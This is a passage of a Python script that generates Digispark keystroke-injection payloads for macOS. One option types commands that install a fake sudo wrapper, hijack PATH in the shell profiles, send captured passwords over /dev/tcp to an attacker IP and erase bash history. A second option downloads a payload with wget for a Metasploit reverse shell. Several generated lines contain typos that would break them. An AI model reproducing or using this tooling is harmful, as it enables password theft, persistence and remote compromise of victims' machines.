> /dev/tcp/' + IP + '/1337 ");\n') 555 | f.write("DigiKeyboard.delay(50);\n") 556 | f.write("DigiKeyboard.sendKeyStro)ke(KEY_ENTER);\n") 557 | f.write("DigiKeyboard.delay(100);\n") 558 | f.write('DigiKeyboard.print("echo "$pwd" | /usr/bin/sudo -S $@ ");\n') 559 | f.write("DigiKeyboard.delay(50);\n") 560 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 561 | f.write("DigiKeyboard.delay(100);\n") 562 | f.write('DigiKeyboard.print("fi");\n') 563 | f.write("DigiKeyboard.delay(50);\n") 564 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 565 | f.write("DigiKeyboard.delay(100);\n") 566 | f.write('DigiKeyboard.print("fi > ~/.config/sudo/sudo");\n') 567 | f.write("DigiKeyboard.delay(50);\n") 568 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 569 | f.write("DigiKeyboard.delay(100);\n") 570 | f.write('DigiKeyboard.print("chmod u+x ~/.config/sudo/sudo");\n') 571 | f.write("DigiKeyboard.delay(50);\n") 572 | f.write("DigiKeyboard.sendKeyStrso)ke(KEY_ENTER);\n") 573 | f.write("DigiKeyboard.delay(100);\n") 574 | f.write('DigiKeyboard.print("echo "export PATH=~/.config/sudo:$PATH" >> ~/.bash_profile");\n') 575 | f.write("DigiKeyboard.delay(50);\n") 576 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 577 | f.write("DigiKeyboard.delay(100);\n") 578 | f.write('DigiKeyboard.print("echo "export PATH=~/.config/sudo:$PATH" >> ~/.bashrc");\n') 579 | f.write("DigiKeyboard.delay(50);\n") 580 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 581 | f.write("DigiKeyboard.delay(100);\n") 582 | f.write('DigiKeyboard.print("history -c && rm .bash_history && exit");\n') 583 | f.write("DigiKeyboard.delay(50);)\n") 584 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 585 | f.write("DigiKeyboard.delay(100);\n") 586 | f.write('DigiKeyboard.print("MOD_GUI_LEFT, KEY_Q");\n ') 587 | f.write("DigiKeyboard.delay(50);\n") 588 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 589 | f.write("} \n") 590 | f.close() 591 | time.sleep(1) 592 | print ('File Created -> '+name+'') 593 | time.sleep(1) 594 | print ('\n' + G + '[!]' + C + 'Starting Nc Server For Password File' + W) 595 | os.system("bash password.sh") 596 | #Option No. 2 597 | elif choice == '2': 598 | os.system("cls") 599 | shell = """ 600 | Reverse Shell 601 | """ 602 | print(C + shell + W) 603 | print ("") 604 | name = raw_input("[!] Enter The File Name -> ") 605 | url = raw_input("[!] Enter URL with Payload Name -> ") 606 | f = open("path"+name+".ino","w+") 607 | f.write('#include "DigiKeyboard.h" \n') 608 | f.write("void setup() { \n") 609 | f.write("} \n") 610 | f.write("void loop() {\n") 611 | f.write("DigiKeyboard.sendKeyStroke(0);\n") 612 | f.write("DigiKeyboard.sendKeyStroke(MOD_GUI_LEFT, KEY_SPACE);\n") 613 | f.write("DigiKeyboard.delay(500);\n") 614 | f.write('DigiKeyboard.print("Terminal");\n') 615 | f.write("DigiKeyboard.delay(50);") 616 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 617 | f.write("DigiKeyboard.delay(100);") 618 | f.write('DigiKeyboard.print("wget http://' + url + '");\n') 619 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 620 | f.write("DigiKeyboard.delay(50);\n") 621 | f.write('DigiKeyboard.println("exit");\n') 622 | f.write("DigiKeyboard.delay(50);\n") 623 | f.write("DigiKeyboard.sendKeyStroke(KEY_ENTER);\n") 624 | f.write("} \n") 625 | f.close() 626 | time.sleep(1) 627 | print ('File Created -> '+name+'') 628 | print ('\n' + R + 'Now Run Reverse Handler in Metasplpoit') 629 | print_menu() 630 | 631 | elif choice == '3': 632 | print ("Exit") 633 | exit() 634 | else: 635 | print("Wrong option selection. Enter any key to try again..") 636 | print_menu() 637 | 638 | try: 639 | print_menu() 640 | 641 | except KeyboardInterrupt: 642 | print ('\n' + R + '[!]' + C + ' Keyboard Interrupt.' + W) 643 | --------------------------------------------------------------------------------